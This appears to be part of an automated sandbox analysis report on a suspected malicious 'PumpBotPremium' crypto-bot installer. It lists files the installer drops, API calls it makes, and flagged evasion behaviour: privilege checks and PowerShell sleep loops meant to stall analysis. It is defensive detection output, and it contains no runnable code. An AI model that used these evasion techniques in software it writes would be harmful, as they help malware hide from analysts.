Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imaging.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7B99.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pythoncom310.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_mt19937.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_bz2.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7CB7.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\fft\_pocketfft_internal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_tests.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\mtrand.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingft.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5gui.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_eksblowfish.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtGui.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\concrt140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_bounded_integers.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_elementtree.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_sfc64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ssl.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7C27.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\win32crypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5core.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\linalg\_umath_linalg.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_pcg64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_webp.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI7C87.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingcms.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtCore.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_tkinter.pyd Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1880 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384 Thread sleep count: 4569 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -900000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -899884s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -899772s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -899652s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -899522s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -899373s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -899262s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -899151s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 344 Thread sleep count: 1724 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4280 Thread sleep count: 5074 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899888s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899747s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899636s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899526s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899377s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899250s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899140s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5932 Thread sleep count: 738 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -899031s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898921s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898812s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898703s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898593s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898484s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898374s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898265s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898156s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -898046s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -897937s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -897828s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -897708s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -897578s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -897468s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -897352s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -897234s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep count: 6187 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899869s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899734s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899609s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep count: 1237 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899391s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899281s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899172s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -899062s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898953s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898844s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898734s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898625s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898516s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898391s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898266s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898156s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898047s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897937s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897828s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897712s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897609s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep count: 4677 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899875s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 2538 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899765s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899656s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899547s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899437s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899328s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899218s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898890s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898781s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898672s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898562s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898453s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898343s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898234s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898125s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898015s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -897906s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002347C0 FindFirstFileW,GetLastError,FindClose, 3_2_002347C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002416D0 FindFirstFileW,FindClose,FindClose, 3_2_002416D0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00229E30 FindFirstFileW,CloseHandle,CreateFileW,SetFilePointer,ReadFile,CloseHandle,SetCurrentDirectoryW,OpenMutexW,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,FindClose, 3_2_00229E30
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0022BF60 DeleteFileW,FindFirstFileW,FindNextFileW,FindClose,PathIsDirectoryW, 3_2_0022BF60
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002940CD FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_002940CD
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002545C0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 3_2_002545C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00254A00 FindFirstFileW,FindClose, 3_2_00254A00
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0024CDF0 FindFirstFileW,FindClose, 3_2_0024CDF0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00211880 FindFirstFileW,FindNextFileW,FindClose, 3_2_00211880
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00231920 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr, 3_2_00231920
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00235AD0 FindFirstFileW,FindClose, 3_2_00235AD0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00255E50 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 3_2_00255E50
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002533F0 _wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 3_2_002533F0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00261680 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus, 3_2_00261680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
